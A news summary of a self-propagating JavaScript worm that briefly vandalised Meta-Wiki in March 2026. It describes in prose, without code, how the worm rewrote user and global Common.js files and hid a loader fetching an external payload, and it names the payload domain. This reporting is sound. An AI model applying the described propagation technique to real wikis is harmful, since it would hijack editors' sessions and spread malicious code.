A self-propagating JavaScript worm hit the Wikimedia Foundation on March 5, 2026, vandalizing pages on Meta-Wiki and infecting user scripts before engineers contained it within 23 minutes.
Editors first flagged the incident on Wikipedia’s Village Pump (technical), where a wave of automated edits began inserting hidden scripts and vandalism across random pages. Wikimedia engineers responded by temporarily restricting editing across projects while they investigated and started reverting changes.
How the Worm Spread
The attack traces back to a malicious script stored at User:Ololoshka562/test.js, first uploaded to Russian Wikipedia in March 2024 and linked to scripts used in previous attacks on wiki projects. According to Wikimedia’s Phabricator issue tracker, the incident began after that script was executed, causing a global JavaScript file to be overwritten with malicious code.
Edit histories suggest a Wikimedia employee account executed the script earlier that day while testing user-script functionality. Whether that execution was intentional, accidental, or the result of a compromised account remains unclear.
Once loaded in a logged-in editor’s browser, the script targeted two files simultaneously. It overwrote the user’s personal common.js with a loader that would silently pull the malicious script on every future visit. If the editor held sufficient privileges, it also modified the global MediaWiki:Common.js, a file executed in every editor’s browser across the platform. Any editor who subsequently loaded that global file would repeat the same cycle, spreading the infection further.
Vandalism Mechanism
Beyond propagation, the worm included a vandalism routine. It called the Special:Random command to pull a random page, then inserted an oversized image and a hidden JavaScript loader into that page’s content:
More Read
- An embedded Woodpecker10.jpg image set to 5,000 pixels wide
- A concealed span element containing a script that loaded an external payload from basemetrika.ru
By the time engineers halted the spread, approximately 3,996 pages had been modified and around 85 users had their common.js files replaced. The number of deleted pages is not yet confirmed.
Response and Containment
Wikimedia staff rolled back the malicious common.js changes for affected users across the platform and suppressed the modified pages so they no longer appear in change histories. The injected code has since been removed, and editing access was restored.
The Wikimedia Foundation confirmed in a statement that the worm was active for only 23 minutes and that content changes were limited to Meta-Wiki, all of which have since been restored. The foundation noted that staff had been conducting a security review of user-authored code when the incident occurred.
No detailed post-incident report has been published explaining precisely how the dormant script was triggered or the full scope of propagation before containment. The episode exposes a structural risk in wiki platforms that allow user-authored JavaScript to execute with session-level privileges, where a single privileged account loading malicious code can initiate a site-wide chain reaction.
Photo by Markus Spiske on Unsplash
This article is a curated summary based on third-party sources. Source: Read the original article
